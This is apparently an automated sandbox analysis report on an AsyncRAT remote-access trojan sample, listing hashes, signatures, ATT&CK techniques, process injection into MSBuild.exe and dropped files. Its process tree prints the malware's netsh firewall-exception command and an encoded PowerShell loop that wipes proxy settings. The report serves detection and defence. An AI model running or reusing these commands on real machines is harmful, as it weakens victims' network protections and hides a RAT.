asyncrat | 6696105b5c08ad9a5c5ffcd5a397612d4908a034ad4faa1e8f1df9352ad41cc5

General

Target

8ad6032daa80a5adaa61010895ed78ce.exe
Size

431KB
MD5

8ad6032daa80a5adaa61010895ed78ce
SHA1

95e3899672ba3f7352806a6b663959c888911069
SHA256

6696105b5c08ad9a5c5ffcd5a397612d4908a034ad4faa1e8f1df9352ad41cc5
SHA512

61c9723ef7458a8da34913a9e80a440d9094c52dde2ac13bc29c6f7c4c7a92903449917c1d64ae07b56102817f2a80e6d754e2195a701748d9f8a12f85043469

Score

10^/10

asyncrat evasion rat suricata

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2804-137-0x000002551C240000-0x000002551C251000-memory.dmp	asyncrat
behavioral2/memory/2804-140-0x0000025535D00000-0x0000025536818000-memory.dmp	asyncrat

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

25 2952 powershell.exe
27 2952 powershell.exe
29 2952 powershell.exe
31 2952 powershell.exe
33 2952 powershell.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 checkip.dyndns.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

8ad6032daa80a5adaa61010895ed78ce.exe

description pid process target process

PID 1400 set thread context of 2804 1400 8ad6032daa80a5adaa61010895ed78ce.exe MSBuild.exe

flow	pid	process
25	2952	powershell.exe
27	2952	powershell.exe
29	2952	powershell.exe
31	2952	powershell.exe
33	2952	powershell.exe

flow	ioc
17	checkip.dyndns.org

description	pid	process	target process
PID 1400 set thread context of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MSBuild.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

MSBuild.exepowershell.exe

pid process

2804 MSBuild.exe
2804 MSBuild.exe
2804 MSBuild.exe
2952 powershell.exe
2952 powershell.exe
2952 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

MSBuild.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2804 MSBuild.exe
Token: SeDebugPrivilege 2952 powershell.exe

pid	process
2804	MSBuild.exe
2804	MSBuild.exe
2804	MSBuild.exe
2952	powershell.exe
2952	powershell.exe
2952	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2804	MSBuild.exe
Token: SeDebugPrivilege	2952	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

8ad6032daa80a5adaa61010895ed78ce.exeMSBuild.execsc.exe

description	pid	process	target process
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 1400 wrote to memory of 2804	1400	8ad6032daa80a5adaa61010895ed78ce.exe	MSBuild.exe
PID 2804 wrote to memory of 204	2804	MSBuild.exe	csc.exe
PID 2804 wrote to memory of 204	2804	MSBuild.exe	csc.exe
PID 204 wrote to memory of 804	204	csc.exe	cvtres.exe
PID 204 wrote to memory of 804	204	csc.exe	cvtres.exe
PID 2804 wrote to memory of 1044	2804	MSBuild.exe	netsh.exe
PID 2804 wrote to memory of 1044	2804	MSBuild.exe	netsh.exe
PID 2804 wrote to memory of 2952	2804	MSBuild.exe	powershell.exe
PID 2804 wrote to memory of 2952	2804	MSBuild.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\8ad6032daa80a5adaa61010895ed78ce.exe
"C:\Users\Admin\AppData\Local\Temp\8ad6032daa80a5adaa61010895ed78ce.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe
2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rpf2a2cv\rpf2a2cv.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:204

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8FE2.tmp" "c:\Users\Admin\AppData\Local\Temp\rpf2a2cv\CSC4AFF82F5A0FE4968AD22644AF790BE1C.TMP"
4⤵
PID:804

C:\Windows\SYSTEM32\netsh.exe
"netsh.exe" firewall add allowedprogram C:\Windows\Microsoft.Net\Framework64\v4.0.30319\MSBuild.exe SystemUpdate ENABLE
3⤵
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -enc dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAKAHQAcgB5AHsAaQB3AHIAIAAnAGgAdAB0AHAAcwA6AC8ALwBnAG8AbwBnAGwAZQAuAGMAbwBtACcAfQBjAGEAdABjAGgAewAKACQAcgBlAGcASwBlAHkAPQAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEkAbgB0AGUAcgBuAGUAdAAgAFMAZQB0AHQAaQBuAGcAcwAiADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAcgBlAGcASwBlAHkAIABQAHIAbwB4AHkARQBuAGEAYgBsAGUAIAAtAHYAYQBsAHUAZQAgADAAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAUAByAG8AeAB5AFMAZQByAHYAZQByACAALQB2AGEAbAB1AGUAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAOwAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAQQB1AHQAbwBDAG8AbgBmAGkAZwBVAFIATAAgAC0AVgBhAGwAdQBlACAAIgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwAAoAfQAKAHMAbABlAGUAcAAgADIAfQA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8FE2.tmp
MD5
39ce99d735821c51c67c79cb8be0f800

SHA1
8c1c743325f2a7866d898eb4a07bc0ab6e4702af

SHA256
f8b013ca590fb92012884d0e8ffb21182c7b400ce03a2311d0c9dba5bab56285

SHA512
b1b44d5f25742069f0291017072c34d0042d7c47661c3a4fa65520aeaa930293120008f063842f091ff8d4e54561c091394428598f787f87fc254d5b21f371f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\rpf2a2cv\rpf2a2cv.dll
MD5
be6e43db294ac04ae018cc737268984e

SHA1
ea529823d702cb02c6ad17457366cee5f69c2b56

SHA256
156929fac00d5734e40d5a2ec75d18bcd1ebdff79b48ae0d1f03b24f38c69745

SHA512
05aa7df66cec909e769cc02b04146fe882f6f3b44ac6cf4dacb9ec45aa2cf509613bec73cca6284c9e26e008579c75e4f842241b121574937b56773fc7e02ff8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rpf2a2cv\CSC4AFF82F5A0FE4968AD22644AF790BE1C.TMP
MD5
0b1a56679ad93afc3bde2e9588499c9a

SHA1
b97c8d9d2a4c2567f7107cfe0bbbff476eb6e1a0

SHA256
45106b123777fe89bc40c2301b67093596f398a050cb3370bdfab07494bf3b28

SHA512
0d54399f91023da5fbe0588ef030ab70f4b95b0008e74b52764fa098415c45732a8eb4edcfa0ea4599400c000d11fda01de2daa9c9f47f0eda8a6e2c627ae0cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rpf2a2cv\rpf2a2cv.0.cs
MD5
eb9d1ba75e2a29b96e3c75b73b41df4c

SHA1
093bd046abe146fc1fffe45f073e0306d365ccbf

SHA256
12480589381d69c1eb1abd50b4eaa33b49dcacbef78e358a757d1d7d11de3bda

SHA512
f03442a0fff3b85ff37d44f071366ea97884f48675433f967317d656dc8e00b184bc51c63c39987fd310a763d1dd9beb8878e0445edc3aa76fd6f62aba94571f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rpf2a2cv\rpf2a2cv.cmdline
MD5
d65c96dbf5a0526f5f17fd4209b8a3f1

SHA1
e19578d5e42786363641c650074a28a332fccda5

SHA256
8c01e3acf81e6501a3b77233075a4c4d2e0ea1c506e876c151b524ebe044e49f

SHA512
dd1f03f6993f2b21de5e2b1ecf1734e61b509b2ba3be7900d8e86e56d9ce7b5b482a1058fa27c5eef84c3f675e97f2f03f2ef60dc74dbc61c6d0dd2b690cef6e

Download Submit
memory/204-129-0x0000000000000000-mapping.dmp

Download
memory/804-132-0x0000000000000000-mapping.dmp

Download
memory/1044-142-0x0000000000000000-mapping.dmp

Download
memory/1400-116-0x0000025D1A960000-0x0000025D1A962000-memory.dmp

Filesize
8KB

Download
memory/1400-114-0x0000025D00390000-0x0000025D00391000-memory.dmp

Filesize
4KB

Download
memory/2804-122-0x0000000140000000-0x0000000140047000-memory.dmp

Filesize
284KB

Download
memory/2804-137-0x000002551C240000-0x000002551C251000-memory.dmp

Filesize
68KB

Download
memory/2804-127-0x0000025534C07000-0x0000025534C08000-memory.dmp

Filesize
4KB

Download
memory/2804-126-0x0000025535550000-0x0000025535551000-memory.dmp

Filesize
4KB

Download
memory/2804-125-0x0000025534C06000-0x0000025534C07000-memory.dmp

Filesize
4KB

Download
memory/2804-124-0x0000025534C03000-0x0000025534C05000-memory.dmp

Filesize
8KB

Download
memory/2804-123-0x0000025534C00000-0x0000025534C02000-memory.dmp

Filesize
8KB

Download
memory/2804-121-0x000002551C080000-0x000002551C081000-memory.dmp

Filesize
4KB

Download
memory/2804-119-0x000002551A6C0000-0x000002551A6DF000-memory.dmp

Filesize
124KB

Download
memory/2804-118-0x0000000140008630-mapping.dmp

Download
memory/2804-136-0x000002551C070000-0x000002551C071000-memory.dmp

Filesize
4KB

Download
memory/2804-128-0x0000025534C08000-0x0000025534C0A000-memory.dmp

Filesize
8KB

Download
memory/2804-138-0x0000025534C0A000-0x0000025534C0F000-memory.dmp

Filesize
20KB

Download
memory/2804-139-0x0000025534BA0000-0x0000025534BA1000-memory.dmp

Filesize
4KB

Download
memory/2804-140-0x0000025535D00000-0x0000025536818000-memory.dmp

Filesize
11.1MB

Download
memory/2804-141-0x0000025534B70000-0x0000025534B71000-memory.dmp

Filesize
4KB

Download
memory/2804-117-0x0000000140000000-0x0000000140047000-memory.dmp

Filesize
284KB

Download
memory/2804-144-0x0000025534B60000-0x0000025534B66000-memory.dmp

Filesize
24KB

Download
memory/2952-143-0x0000000000000000-mapping.dmp

Download
memory/2952-158-0x0000014D51CE0000-0x0000014D51CE2000-memory.dmp

Filesize
8KB

Download
memory/2952-159-0x0000014D51CE3000-0x0000014D51CE5000-memory.dmp

Filesize
8KB

Download
memory/2952-160-0x0000014D51CE6000-0x0000014D51CE8000-memory.dmp

Filesize
8KB

Download
memory/2952-161-0x0000014D6BC50000-0x0000014D6BC51000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads